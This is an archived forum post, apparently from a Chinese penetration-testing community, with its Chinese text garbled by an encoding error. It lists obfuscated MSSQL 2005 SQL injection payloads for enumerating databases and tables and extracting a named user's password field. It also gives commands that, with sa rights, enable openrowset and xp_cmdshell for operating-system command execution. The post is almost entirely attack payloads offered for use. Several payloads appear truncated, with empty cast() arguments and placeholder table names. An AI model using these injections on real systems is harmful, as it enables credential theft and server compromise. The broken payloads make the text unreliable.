MSsql2005×¢ÈëÓï¾ä

admin ·¢±íÓÚ 2012-9-13 17:19:47

CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast(/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/../**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/../**/order/**/by/**/dbid/**/desc))%3d0--

±¬±íÓï¾ä,somedb²¿·ÝÊÇËùÒªÁÐµÄÊý¾Ý¿â£¬ºìÉ«Êý×Ö1ÀÛ¼Ó

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

±¬×Ö¶ÎÓï¾ä£¬±¬±íadminÀïuser='icerover'µÄÃÜÂë¶Î

CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast(/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**//**/From/**/../**/Where/**/user='icerover'/**/Order/**/by/**/)/**/T/**/Order/**/by/**/Desc)%3d0--

mssql2005Ä¬ÈÏÃ»ÓÐ¿ªxp_cmdshellµÄ£¬openrowsetÒ²²»ÄÜÓÃ
Èç¹ûÊÇsaÈ¨ÏÞ£¬¿ÉÒÔÕâÑùÀ´¿ªÆô
¿ªÆôopenrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

¿ªÆôxp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~Íí°²

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

MSsql2005×¢ÈëÓï¾ä